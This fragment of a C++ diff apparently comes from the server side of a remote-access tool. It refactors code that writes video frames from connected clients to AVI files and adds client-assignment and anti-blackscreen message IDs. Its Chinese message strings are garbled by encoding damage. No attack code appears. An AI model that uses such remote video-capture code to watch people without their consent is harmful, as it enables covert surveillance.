return AVIStreamWrite(m_pavi, m_nFrames++, 1, lpBuffer, m_si.dwSuggestedBufferSize, AVIIF_KEYFRAME, NULL, NULL) == AVIERR_OK;
}
void CBmpToAvi::Close()
{
if (m_pavi) {
AVIStreamRelease(m_pavi);
m_pavi = NULL;
}
if (m_pfile) {
AVIFileRelease(m_pfile);
m_pfile = NULL;
}
}
void CVideoDlg::SaveAvi(void)
{
@@ -92,8 +31,9 @@ void CVideoDlg::SaveAvi(void)
if(dlg.DoModal () != IDOK)
return;
m_aviFile = dlg.GetPathName();
if (!m_aviStream.Open(m_aviFile, m_BitmapInfor_Full)) {
MessageBox("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>¼<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>ʧ<EFBFBD><EFBFBD>:"+m_aviFile, "<EFBFBD><EFBFBD>ʾ");
int code;
if (code = m_aviStream.Open(m_aviFile, m_BitmapInfor_Full)) {
MessageBox("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>¼<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>ʧ<EFBFBD><EFBFBD>:"+m_aviFile + "\r\n<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: " + CBmpToAvi::GetErrMsg(code).c_str(), "<EFBFBD><EFBFBD>ʾ");
m_aviFile.Empty();
} else {
pSysMenu->CheckMenuItem(IDM_SAVEAVI, MF_CHECKED);

29
server/2015Remote/VideoDlg.h
View File

@@ -1,34 +1,7 @@
#pragma once
#include "IOCPServer.h"
#include <Vfw.h>
#pragma comment(lib,"Vfw32.lib")
/************************************************************************
* @class CBmpToAvi
* @brief λͼתAVI֡
************************************************************************/
class CBmpToAvi
{
public:
CBmpToAvi();
virtual ~CBmpToAvi();
bool Open(LPCTSTR szFile, LPBITMAPINFO lpbmi);
bool Open(HWND m_hWnd, LPCTSTR szFile, LPBITMAPINFO lpbmi, BOOL bIsWebCam = FALSE)
{
return FALSE;
}
bool Write(LPVOID lpBuffer);
void Close();
private:
PAVIFILE m_pfile;
PAVISTREAM m_pavi;
int m_nFrames;
static AVISTREAMINFO m_si; // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Ǿ<EFBFBD>̬<EFBFBD><CCAC>
};
#include "Bmp2Video.h"
class CVideoCodec
{

BIN
server/2015Remote/resource.h
View File

Binary file not shown.

1
server/2015Remote/stdafx.h
View File

@@ -89,6 +89,7 @@
#define WM_SHARE_CLIENT WM_USER+3026
#define WM_ASSIGN_CLIENT WM_USER+3027
#define WM_ASSIGN_ALLCLIENT WM_USER+3028
#define WM_ANTI_BLACKSCREEN WM_USER+3029
#ifdef _UNICODE
#if defined _M_IX86